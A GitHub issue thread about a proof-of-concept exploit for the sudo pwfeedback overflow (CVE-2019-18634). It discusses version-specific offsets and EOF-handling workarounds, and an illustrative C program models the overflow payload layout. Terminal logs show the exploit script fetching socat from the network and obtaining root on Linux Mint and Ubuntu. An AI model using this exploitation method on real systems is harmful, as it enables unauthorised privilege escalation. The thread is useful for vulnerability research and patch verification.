Maybe not work with some sudo versions? #1

Open
brant-ruan opened this issue Feb 7, 2020 · 9 comments

Comments

@brant-ruan

Congrats on the amazing work :P

However, I have tested this script (the latest commit up to now) on Ubuntu 16.04 with sudo 1.8.16 and on Kali with sudo 1.8.29, and neither succeeded (I see the sudo version in the video in your post is 1.8.25).

Is there any special step needed to configure, generate and run the exploit?

I have read your post but cannot understand it well... Maybe I should learn a lot more.

Anyway, thx :)

@k3an3

k3an3 commented Feb 7, 2020

Also confirming it doesn't work on 1.8.27 and 1.8.29, haven't debugged in depth. I have a separate working PoC; offsets tend to vary across sudo versions.

@Plazmaz (Owner)

Plazmaz commented Feb 7, 2020

It seems pretty likely the offsets differ between versions. To remedy this you'd want to look at the BSS section and see at what data is present between the end of the buffer and the start of the user struct. If someone wants to make this more compatible I'd be willing to accept a PR, but this was intended more as a PoC, not a fully compatible tool.

@Plazmaz (Owner)

Plazmaz commented Feb 7, 2020

That being said, I will probably add some warning about this in the README, as it's certainly a gotcha, and there's probably a more resilient way of doing this.

@saleemrashid

The offsets on Ubuntu 18.04 (Sudo 1.8.25p1) and 20.04 (Sudo 1.8.29) are the same, but this PoC will not work unmodified because Sudo introduced special EOF handling. The EOF character, also known as Ctrl-D, is 0x04 which is inconveniently the same byte you're writing to tgetpass_flags. There are a few possible workarounds for this.
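The two points raised above, that the exploit has to cross whatever the linker placed between the end of the password buffer and the user struct (which differs per build), and that the 0x04 written to tgetpass_flags is also the Ctrl-D byte that newer sudo treats as end of input, can be modelled offline. The C program below is an added example for this page, not code from the CVE-2019-18634 repository, from saleemrashid's exploit or from sudo itself. The struct layout, the field names, the 72-byte gap, the all-zero placeholder contents of the user struct and the `model_*` functions are assumptions chosen for illustration; `model_deliver()` stands in for a line reader that either ignores or honours the EOF byte. On a real target the gap and the struct contents have to be read out of the specific binary, which is exactly the per-version work the thread describes.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical model of the BSS layout discussed in the thread: a static
 * password buffer, then whatever other data the linker placed after it,
 * then the user details struct, then the tgetpass flags word.  The sizes,
 * field names and the 72-byte gap are assumptions for this example, not
 * sudo's real layout; on a real target the gap is read out of the binary.
 */
#define MODEL_BUF_SIZE 256
#define MODEL_FLAG_VALUE 0x04   /* value the thread says the PoC writes to tgetpass_flags */
#define EOF_CHAR 0x04           /* Ctrl-D, which newer sudo treats as end of input */

struct model_user_details {
    int uid;
    int gid;
    int ngroups;
};

struct model_bss {
    char buf[MODEL_BUF_SIZE];
    char other_data[72];        /* assumed filler between buffer and user struct */
    struct model_user_details user;
    int tgetpass_flags;
};

/* Bytes between the end of the buffer and the start of the user struct:
 * the version-specific number the thread says must be re-derived per binary. */
size_t model_gap(void)
{
    return offsetof(struct model_bss, user) - MODEL_BUF_SIZE;
}

/* Lay out an overflow payload for the model: fill the buffer, pad across the
 * gap, drop in a placeholder user struct (all zeros; what the real PoC puts
 * there is not stated in the thread), then the flags word.  Returns the
 * payload length, or 0 if the output buffer is too small. */
size_t model_build_payload(uint8_t *out, size_t cap)
{
    struct model_user_details placeholder = {0, 0, 0};
    int flags = MODEL_FLAG_VALUE;
    size_t len = offsetof(struct model_bss, tgetpass_flags) + sizeof flags;

    if (cap < len)
        return 0;
    memset(out, 'A', offsetof(struct model_bss, user));       /* buffer + gap */
    memcpy(out + offsetof(struct model_bss, user), &placeholder, sizeof placeholder);
    memcpy(out + offsetof(struct model_bss, tgetpass_flags), &flags, sizeof flags);
    return len;
}

/* Index of the first byte an EOF-aware reader would stop at, or -1 if none. */
long model_first_eof(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == EOF_CHAR)
            return (long)i;
    return -1;
}

/* Deliver the payload into the model BSS the way a line reader would: an
 * EOF-aware reader stops at the first 0x04, an unaware one copies everything.
 * Returns the number of bytes that actually landed. */
size_t model_deliver(struct model_bss *bss, const uint8_t *p, size_t n, int eof_aware)
{
    size_t take = n;
    if (eof_aware) {
        long e = model_first_eof(p, n);
        if (e >= 0)
            take = (size_t)e;
    }
    if (take > sizeof *bss)
        take = sizeof *bss;
    memcpy(bss, p, take);
    return take;
}

/* Run the whole scenario on a fresh model (uid 1000, flags 1 beforehand)
 * and return the flags word the payload left behind. */
int model_scenario_flags(int eof_aware)
{
    uint8_t payload[sizeof(struct model_bss)];
    struct model_bss bss;
    size_t n;

    memset(&bss, 0, sizeof bss);
    bss.user.uid = 1000;
    bss.tgetpass_flags = 1;
    n = model_build_payload(payload, sizeof payload);
    model_deliver(&bss, payload, n, eof_aware);
    return bss.tgetpass_flags;
}

int main(void)
{
    uint8_t payload[sizeof(struct model_bss)];
    size_t n = model_build_payload(payload, sizeof payload);

    printf("gap between buffer end and user struct: %zu bytes\n", model_gap());
    printf("first 0x04 byte at offset %ld, flags word starts at offset %zu\n",
           model_first_eof(payload, n), offsetof(struct model_bss, tgetpass_flags));
    printf("flags after delivery, no EOF handling:   0x%02x\n", model_scenario_flags(0));
    printf("flags after delivery, with EOF handling: 0x%02x\n", model_scenario_flags(1));
    return 0;
}
```

The point the model makes is that the user struct is still reachable with EOF handling in place, because it lies before the flags word in the payload; it is only the 0x04 byte itself that terminates input, so the flags word is left at its old value. Any workaround has to get that value into tgetpass_flags without the reader seeing a raw 0x04 as the terminating byte.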

@Plazmaz (Owner)

Plazmaz commented Feb 7, 2020

Oh interesting. I hadn't looked into it too much. I appreciate the information, and remember seeing some information around EOF handling changes. I will probably take a look at it when I get some more time. Thanks!

@saleemrashid

You can take a look at the workaround I used in my exploit, but it unfortunately won't be applicable to your exploit. Though I do know another simple trick that should work for you 😜

@Plazmaz (Owner)

Plazmaz commented Feb 7, 2020

Cool, appreciate the hints! I'll need to dig into it some more. My first rough guess would be something around changing EOL settings for the tty, but it may be simpler than that.

@bcoles

bcoles commented Feb 7, 2020

Tested successfully on a couple of systems.

Linux Mint 19.3 with sudo 1.8.21p2:

test@linux-mint-19-3-amd64:~/Desktop/CVE-2019-18634$ id
uid=1001(test) gid=1001(test) groups=1001(test)
test@linux-mint-19-3-amd64:~/Desktop/CVE-2019-18634$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
test@linux-mint-19-3-amd64:~/Desktop/CVE-2019-18634$ ./self-contained.sh 
[sudo] password for test: 
Sorry, try again.
Sorry, try again.
sudo: 2 incorrect password attempts
Exploiting!
root@linux-mint-19-3-amd64:/home/test/Desktop/CVE-2019-18634# id
uid=0(root) gid=1001(test) groups=1001(test)

Linux Mint 19.2 with sudo 1.8.21p2:

user@linux-mint-19-2:~/Desktop/CVE-2019-18634$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
user@linux-mint-19-2:~/Desktop/CVE-2019-18634$ ./self-contained.sh 
--2020-02-08 10:42:06--  https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.192.133, 151.101.128.133, 151.101.64.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.192.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: ‘socat’

socat                                                       100%[=========================================================================================================================================>] 366.38K  --.-KB/s    in 0.03s   

2020-02-08 10:42:07 (10.9 MB/s) - ‘socat’ saved [375176/375176]

[sudo] password for user: 
Sorry, try again.
Sorry, try again.
sudo: 2 incorrect password attempts
Exploiting!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@linux-mint-19-2:/home/user/Desktop/CVE-2019-18634# id
uid=0(root) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare)
root@linux-mint-19-2:/home/user/Desktop/CVE-2019-18634#

@0xF41

0xF41 commented Dec 26, 2020

On Ubuntu 18.04, it seems that this exploit is patched by the security fix in sudo version 1.8.21p2-3ubuntu1.2. A downgrade of the sudo version to 1.8.21p2-3ubuntu1 is required for this exploit/script to work.

Ubuntu 18.04:

root@ubuntu:~# lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 18.04.4 LTS
Release:	18.04
Codename:	bionic
root@ubuntu:~# uname -a
Linux ubuntu 5.3.0-28-generic #30~18.04.1-Ubuntu SMP Fri Jan 17 06:14:09 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# dpkg -l | grep sudo
ii  gnome-sudoku                               1:3.28.0-1                                      amd64        Sudoku puzzle game for GNOME
ii  sudo                                       1.8.21p2-3ubuntu1                               amd64        Provide limited super user privileges to specific users
root@ubuntu:~# sudo -l
Matching Defaults entries for root on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, pwfeedback

User root may run the following commands on ubuntu:
    (ALL : ALL) ALL
root@ubuntu:~# su administrator
administrator@ubuntu:/root$ cd ~/CVE-2019-18634/
administrator@ubuntu:~/CVE-2019-18634$ ls
README.md  self-contained.sh  src
administrator@ubuntu:~/CVE-2019-18634$ ./self-contained.sh 
--2020-12-25 19:43:28--  https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.8.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.8.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: ‘socat’

socat                                    100%[==================================================================================>] 366.38K  2.29MB/s    in 0.2s    

2020-12-25 19:43:28 (2.29 MB/s) - ‘socat’ saved [375176/375176]

/usr/bin/ld: cannot open output file /tmp/pipe: Permission denied
collect2: error: ld returned 1 exit status
[sudo] password for administrator: 
Sorry, try again.
sudo: 1 incorrect password attempt
Exploiting!
root@ubuntu:/home/administrator/CVE-2019-18634# whoami
root
root@ubuntu:/home/administrator/CVE-2019-18634# id
uid=0(root) gid=1001(administrator) groups=1001(administrator)
root@ubuntu:/home/administrator/CVE-2019-18634# 
